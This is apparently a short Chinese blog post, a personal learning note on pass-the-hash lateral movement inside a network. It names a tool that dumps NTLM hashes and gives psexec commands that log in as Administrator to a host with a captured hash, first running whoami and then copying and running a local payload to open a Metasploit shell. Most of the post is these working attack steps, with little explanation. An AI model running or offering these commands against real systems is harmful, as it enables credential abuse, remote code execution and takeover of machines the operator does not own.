横向渗透hash传递注入

发表于 | 分类于 | 热度:

在内网渗透中有时候抓不到明文密码,也可以用hash传递注入攻击拿下另一个目标

获取hash

工具地址:https://github.com/alone5xiao/hamal.cc
获取hash

1
q.exe -dhl

hash传递注入

先执行whoami命令看看:

1
psexec.exe Administrator@192.168.3.21 whoami -hashes AAD3B435B51404EEAAD3B435B51404EE:880FDF4355DBB26715EA2DF2C408664E


看到执行成功的。配合msf使用,开始hash传递注入:

1
psexec.exe Administrator@192.168.3.21 -c d:\windows.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:880FDF4355DBB26715EA2DF2C408664E

说明:d:\windows.exe是本地shell的物理地址,我放到d盘目录下。

msf成功获取到shell

总结

又学到一个内网渗透技能…

-------------本文结束感谢您的阅读-------------
分享到: 收藏夹 复制网址 邮件 微信 QQ空间 腾讯微博 豆瓣 一键分享 更多